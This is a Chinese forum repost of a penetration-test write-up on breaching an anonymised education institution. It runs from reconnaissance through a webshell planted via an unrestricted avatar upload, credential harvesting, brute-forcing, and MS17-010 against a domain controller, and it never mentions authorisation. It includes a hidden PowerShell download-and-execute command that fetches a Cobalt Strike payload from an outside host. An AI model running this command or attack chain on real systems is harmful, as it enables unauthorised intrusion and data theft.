找回密码
 立即注册
查看: 2580|回复: 0

渗透实战 | 从外网直接打到内网全过程

[复制链接]
发表于 2024-3-1 19:41:32 | 显示全部楼层 |阅读模式

, x+ L1 n. I" ~9 i! f" j 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路/ |4 d) U: M2 ~& |3 J! v

* C4 Q2 W) b- V

: } i$ a. t6 z3 L R   0 h/ r* a1 m9 i' |4 J8 G: k

+ G( ^9 |* P! G* Z$ h

* U6 N t P% K# j 正文/ J! |6 ^9 b. C) p

: ~7 G, ]$ X: Y' s1 e

1 A& V7 [! r% C2 M. b+ I# `) Y( ~  ' G" P! M, N! j% a. p

9 ]0 Z0 s$ u! l: m' I

% @1 Z' F% a+ [: e% d 目标:www.xxxx.com(一家教育机构)
( b5 R: }* L: M# p6 b
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
6 F/ X, Y) r; [

" H7 j% o7 _/ ?

- ^. N. C' C/ m% E vshapes= 4 k! R8 B* z& f( ~) E7 `1 H/ s

5 c2 A: m5 x3 x& P

- U8 Q; b( t6 A7 G5 z7 u6 ~7 S4 } 进行了简单的信息搜集
: |3 a4 A6 j v, `
0 ]& O0 }4 O" ^6 c8 c
' C) k+ A* |, Q0 E) L) \, t5 x

2 [7 r7 b% z, [5 h$ o' b' Q' W& j5 S

& X0 \4 C! ?/ Z+ t 子域名搜集8 O9 p# @+ U+ N# m1 l- x

6 T( w+ X3 S" N* L

9 ~! d) t: O& o" Q3 J1 X( b vshapes= 2 p4 g6 j0 _( n5 t

' d) W$ J. z% R! I6 A, b& E/ n/ C7 R1 `

$ n3 G/ E3 C4 n1 o fofa找资产
8 m6 R1 c8 ~' t9 I
" O2 }/ |0 |( h
1 X5 g' i$ w: H, X9 ?

" y# Y. v+ J# V' r! O b2 R

* T& T4 ]1 R( Z6 ~) K/ P vshapes=: @6 R! J! ^% X+ P6 K* o

4 Q G2 Q5 O" n: V+ w$ q$ F' t

, a! b A3 Q/ V+ f C3 C 一共七个资产。去重之后只有两个。
; E3 f% D* l7 @2 ^
4 ^0 q6 p; `) ?0 Q
) E' M! l' z& j: s+ z* A9 a

+ G6 e- `) r G, X2 ?

2 E! Z6 |/ B3 M3 |4 M5 g 目录探测: }& Q" J) e8 Z, B4 p

( M9 L r% \ [8 e

6 k& Z& b1 O7 g( J vshapes= 7 r0 R2 M1 c. a* O$ F- L. x

~; P: j! b4 I1 H1 \% G3 x/ p

. {6 ]1 o& U2 `% e7 L+ M0 s$ S 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
0 @/ V) k9 J1 X- ~9 Q1 ~
3 g) w" H$ t }0 b$ u
" `: g* G; R- p" L" q

$ I5 Q) X6 `2 `; _% g# i

) T J* `- w1 |, \ 我又尝试了通过修改返回包来绕过登录界面* O% ~2 d# N0 x

, W/ D, B3 h* g/ Y$ J- e

6 v+ m: Z( E8 O5 g& ~ vshapes=' y' {8 {: N; N3 m) v

# B( @8 _8 h2 p

, T, J: x0 o _7 u/ Z9 i 还是不行,尝试注入无果2 t9 U& X, ^0 Q7 n

: N9 B3 g$ Y; N+ U3 O/ T

- V/ R- H- a7 t6 h) [& R; X vshapes=7 ~+ A, n1 T5 u& S# O8 g" i) T) c

& `* h; k* M* i" g9 i2 ?

( Y& U: ?: Q# p 不过我目录探测出了一处Spring信息泄露
. ~! E6 E" v0 ?- u( n* M
6 e, J/ f2 a" J
7 e2 p0 Z& i( l: I0 Q: H

9 k' B$ k z+ x9 H

d/ P& D* g- j6 p vshapes= ' m' c3 ]! Z. Z# N0 P6 j) i

' a' J# y6 v; V8 ~

" i+ |5 a' u! a+ D9 C6 s& ^' b 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录# r1 J. Y8 p' u& r

1 E: m2 D6 v& `6 J% s2 }4 F

! @% {! G3 ` _' @ vshapes= # H; v7 _) k K" d1 N; b+ q

( G( Y& S1 V5 @% K3 c

5 o! Y' Z' x- ^/ k8 ] 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。7 o4 F: r- v0 K

* m; {7 j7 g; q9 F: C8 H! w, M

& t$ b# Z" R) t" M vshapes= 4 W' y1 j/ I" ~& T

1 w" S* Q% f3 o, H7 [& Q* B

+ T+ W3 C9 Q" e4 Q5 w; \& B, N1 g 获取有些师傅到这一步就手机抓包电脑测了。6 \4 S3 X, [% {% G4 l" L$ F

; ~& v# V& Q- j6 G

5 R: }, r% w' A- D+ t# G* ~ Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。7 r/ t2 s) D w6 g

% T1 C# z5 M: T/ Q( O) k

( v+ G/ }/ ]* y F/ ~* P. L" d 其中在一个公众号发现了小程序,可以进行注册。1 v, R& H5 F: V. L, ], l& M

7 c( @, \& K* I! `$ l, J

5 g) ^( N/ Q# A( b 看到了头像上传,尝试上传获取WebShell- }7 X7 ~0 R1 q0 k4 F; A' [

+ r3 I- \6 @5 f

% E; |- E7 Y. ^" q vshapes=, I# s/ w! N8 W$ n# M0 y

# g0 R; f9 l# N

( H* ~1 g: Y. I7 ^0 Y: ?" n: h9 \ 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问 8 x; H4 f+ |/ l" f& J

6 B; U4 \1 L% Q9 H8 c

- B$ u& w1 J: T: n0 e vshapes=+ s- S0 _8 X2 S g* t8 {- Q8 L* a! t

' U. s5 O: S3 |- I

: C4 Y4 o* Q3 T 然后上了大马 2 s: T: B8 l+ J$ r& Q( C7 Q, r0 W

" I' \+ f# T6 l9 T' s

% t' A2 B+ o% B$ D! J) D vshapes=) k9 C& h7 e/ I$ k' S6 W5 S# [

" Y( N1 @" }; T' [" R

2 `% B3 K3 _1 ^! M. M% M& I6 s vshapes= , g- n$ J7 Y0 Z9 q4 n

8 ^4 B3 C& N9 X. J+ k

' U1 a( g* M3 b 通过翻找文件发现数据库账号密码 H- K' L3 r3 K: P7 [: y

. c/ S. u. n5 g

# @3 q* ]- O7 |1 S) n L+ I vshapes= r0 ?9 g6 N9 F4 `0 z" K" s

2 c- }/ C# j' `' e

& z( w4 m& f. U- s- l --内网渗透 8 R" C! D+ {, ]% B, F( @- _

# R" l# H* ?5 {( \1 Y9 W

0 ]- V8 ~, o8 O* s* ?6 E* T 直接通过powershell执行 cs上线 6 E. i$ { w7 ^, H# a5 V

2 e' i7 w# U; L8 `: G! X. `

( q& f$ K5 H+ P powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"( W" E# j! P. W8 i. N

6 a& R$ X& \2 E P

6 X# i/ m- A6 d6 { vshapes= " i: Z' z+ h# O! ^* k+ Q

# R( }: d2 m& s1 y

( Q! a( k$ z9 p- m2 w- p; o: W 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 " w6 Q; K. y% D" E2 D5 p

" e0 T! i% r6 r2 s7 R

: E+ J/ n% N/ o. \1 F9 ?+ { vshapes= X! K# W& J9 k: a5 i

. R, B- N( A( V9 M% T: v

2 G n8 g3 }% q0 w 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
% \( ?/ M& `0 b) {+ K
" I2 g8 }4 R5 ^' y P) {8 r
7 r4 O1 T$ i: U9 A
1 b: ~8 {8 i6 l& K# s7 d

" |! H- `% H) i/ b1 K# O) e! ?

& [5 ]$ }" q) i vshapes=5 P: r+ ~5 z& t; e4 k# s& b

% @, D" @7 D9 Z( U* y1 j

! H) A3 j6 `# K/ z" ` 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
% K& c* j( @' v, s* I3 X
+ r9 w) _7 Q- V) Q G. {# c& v- ?
( M2 a/ _: o% u3 ]

: D' ?' }' j |0 {) j

7 M$ N; S: A. X0 t# i3 H0 g4 D* g vshapes=" e' w9 A3 T {/ l4 E S( g

! f1 i* f0 R& ~+ l0 q! {

+ e/ l! L ^) u7 b
; F* z5 {' ?0 |2 \4 J
+ o) y, s8 j# s3 p% G7 o
, [" \; m# i- Q3 J$ K: }+ c% N& z

+ i) @/ l7 K5 k( E P

# j0 S, z) b, d) Z9 g   ' ~& p: o8 x8 e+ ?7 k* v9 s( s' p

6 D D& K7 F; I

; s3 S2 C0 _2 Z: R# g% t- t4 x 小结. x7 ^/ U3 P0 V7 t, `

7 v* c& u0 l1 k8 Q: X

. Z9 y# P# i, C1 L   / f( k1 X( c& T1 |

9 ?4 O2 t+ e0 m( h7 P" x( t3 Y

0 y( K! k v/ ?0 R 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路! $ V$ p- K+ {: E* S# K2 H

6 E$ O1 }, k) s

% j* g% j. q) q4 s   + O* ^! f0 j# _( P+ i

1 Z% L3 `1 w" i0 q4 j5 J9 p) g
    / ]: Y: ^& f$ L$ i
  • ( M4 \/ a" F. ]' K0 x" r  - C6 j5 e& H1 [- `
  • ! T# S& x; K9 G5 N3 S
  • 3 y! F* \8 j7 k# `6 A8 [0 J  6 D0 j* _% v+ M+ y! [: H* [
  • " e( O5 p5 z& E
& ?/ m E4 m) d, N/ Q

1 a: D* _1 i- Y i3 C 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html z; n" \4 L* K# X' M$ I% Y7 {) m

; [/ v1 d( X+ J1 a: A

" o; \" N6 r& a  5 P7 s5 q4 q% U9 u% o

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表